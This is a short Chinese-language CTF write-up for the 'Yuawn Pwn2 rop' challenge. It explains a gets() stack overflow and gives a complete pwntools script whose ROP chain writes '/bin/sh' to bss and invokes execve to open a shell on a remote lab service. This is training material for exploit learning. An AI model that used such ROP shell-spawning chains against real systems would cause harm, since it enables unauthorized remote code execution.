Yuawn Pwn2 rop Writeup

kazma 成大資安社 創辦人/社長

rop

雖然有附 source,但我們假裝沒有 XD。
來用 r2 看一下 main:

r2

看到一個 0x30 的 buffer,用 gets 去讀,那我們就 rop 開一個 shell。
用以下的指令來搜集需要的 gadget:

1
2
ROPgadget --binary ./rop --only "pop|ret" | less
ROPgadget --binary ./rop --only "mov|ret" | less

用 gdb 的 vmmap 看一下可以寫入 “/bin/sh\0” 的位址,再用 x/30gx 檢查一下會不會蓋到東西:

vmmap

exploit.py:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
from pwn import *

context.arch = 'amd64'

r = remote('10.129.0.57', 10173)

pop_rax = 0x0000000000415714
pop_rdi = 0x0000000000400686
pop_rdx_rsi = 0x000000000044beb9
syscall = 0x000000000040125c
bss = 0x00000000006b6000
mov_q_rdi_rdx = 0x00000000004356b3
pop_rdx = 0x000000000044be96

p = b'a'*0x38
p += p64(pop_rdi) + p64(bss)
p += p64(pop_rdx) + b'/bin/sh\0' + p64(mov_q_rdi_rdx)
p += p64(pop_rdx_rsi) + p64(0x0) + p64(0x0)
p += p64(pop_rax) + p64(0x3b)
p += p64(syscall)

r.sendlineafter(b':D', p)
r.interactive()

執行結果:

result

Pwned !!!

  • Title: Yuawn Pwn2 rop Writeup
  • Author: kazma
  • Created at : 2023-12-12 18:47:00
  • Updated at : 2023-12-14 01:06:10
  • Link: https://kazma.tw/2023/12/12/Yuawn-Pwn2-rop-Writeup/
  • License: This work is licensed under CC BY-NC-SA 4.0.
Comments
On this page
Yuawn Pwn2 rop Writeup